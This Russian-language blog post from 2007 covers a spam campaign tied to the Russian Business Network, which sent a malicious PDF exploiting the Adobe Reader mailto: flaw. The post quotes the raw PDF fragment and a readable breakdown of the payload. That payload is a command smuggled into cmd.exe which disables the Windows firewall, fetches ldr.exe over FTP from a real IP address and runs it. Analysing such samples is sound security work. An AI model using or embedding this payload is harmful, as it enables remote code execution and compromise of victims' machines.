пятница, 26 октября 2007 г.

RBN: PDF эксплоит

Мы любим РБН за то, что они верны себе. Их черный флаг гордо реет а курс не меняется чтобы не происходило вокруг их имени.
Яркий пример:

Семантек обьявляет о нахождении эксплоита в PDF файлах (касперские детектят с 17 числа):

http://www.securitylab.ru/news/306212.php

Вредоносный документ PDF, использующий баги в программном обеспечении Adobe Systems Reader и Acrobat, выпущен на волю, сообщила компания Symantec во вторник — спустя всего несколько часов после того, как Adobe предложила исправления для своих программ.
«Эта массовая рассылка файлов эксплойта может быть попыткой использовать промежуток времени между выпуском патча и его повсеместной установкой», — пишет Symantec в предупреждении для клиентов своей информационной сети DeepSight. Вредоносный документ PDF вложен в спамерское письмо и носит имя YOUR_BILL.pdf или INVOICE.pdf. Он использует уязвимость протокола mailto:, выявленную более месяца назад британским исследователем Петко Петковым.

В понедельник Adobe исправила ошибку и выпустила обновленные редакции Reader и Acrobat. Пользователям более ранних версий популярных программ предлагается либо перейти на 8.1.1, либо применить одно из временных решений, предложенных Adobe для отражения атак. В понедельник Adobe пообещала обновить Adobe Reader 7.0.9 и Acrobat 7.0.9, но конкретные сроки не назвала.

Когда получатель открывает файл PDF, тот запускает троянского коня с именем Pidief.a, который отключает межсетевой экран Windows и загружает в компьютер другую программу. Это специальный загрузчик, способный извлекать файлы из удаленного сервера и внедрять их в зараженный ПК по команде хозяина. «Этот сервер все еще работает и продолжает обслуживать загрузчик через FTP», — предупредила Symantec во вторник утром, добавив, что сервер представляет собой хорошо известное место хостинга вредоносного ПО.

Хотя Adobe исправила последние версии Reader и Acrobat, на самом деле уязвимость лежит на совести Microsoft, которая призналась в этом две недели назад, пообещав исправить в Windows XP и Windows Server 2003 блоки управления такими общеупотребительными протоколами, как mailto:. Эксплойт PDF опасен только для пользователей браузера Internet Explorer 7 на системах XP или Windows Server 2003. Symantec рекомендует «как можно быстрее применить патчи, предложенные в Adobe Advisory APSB07-18».

Как вы думаете где загрузчик?

Фрагмент PDF:

##5 0 obj<>dendobjd6 0 obj###<<###/CropBox[0 0 595 842]/Parent 1 0 R/Contents 13 0 R/Rotate 0/Group<
###<####/I true/CS/DeviceRGB/S/Transparency>>/MediaBox[0 0 595 842]/Resources 7 0 R/Type/Page/AA<>>>dendobjd14 0 obj<%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo b
inary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/S/URI>>dendobjd1 0 obj<
Примерно вот так это выглядит, если по-русски:

/Windows/system32/cmd".exe"" /c /q
@echo off
netsh firewall set opmode mode=disable
echo o 81.95.146.130
echo binary
echo get /ldr.exe
echo quit
ftp -s:1 -v -A>nul
del /q
start ldr.exe

Адрес принадлежит конечно РБН:

Отправить комментарий